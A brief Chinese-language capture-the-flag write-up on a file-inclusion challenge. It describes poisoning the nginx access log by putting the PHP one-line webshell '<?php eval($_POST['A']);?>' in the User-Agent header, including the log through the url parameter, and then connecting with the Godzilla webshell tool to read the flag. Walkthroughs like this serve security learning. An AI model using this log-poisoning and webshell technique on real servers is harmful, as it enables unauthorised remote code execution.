1.进来看题为 文件包含。
日志包含然后使用webshell工具,这里我用的是哥斯拉进行getshell
然后查看消息头--》网络--》
Server | nginx/1.18.0 (Ubuntu) |
2.服务器为Ubuntu,服务为nginx。
nginx的日志文件在/var/log/nginx/access.log和error.log中
其中access.log文件是可以打开的。
在url中加入?url=/var/log/nginx/access.log。
3.下一步进行抓包,写入一句话木马。
这里url中是无法写入的,写入后会出现400 Bad Request
只能在参数里面进行写入。
当出现界面刷新时表示getshell。
在User-Agent代理中写入一句话木马。
<?php eval($_POST['A']);?>
然后用webshell工具连接。
这里我用的是哥斯拉。
输入url,这里的密码为A,最后getshell 。
出现这个界面表示连接成功了,然后在文件管理中找到flag.txt就能看到flag了。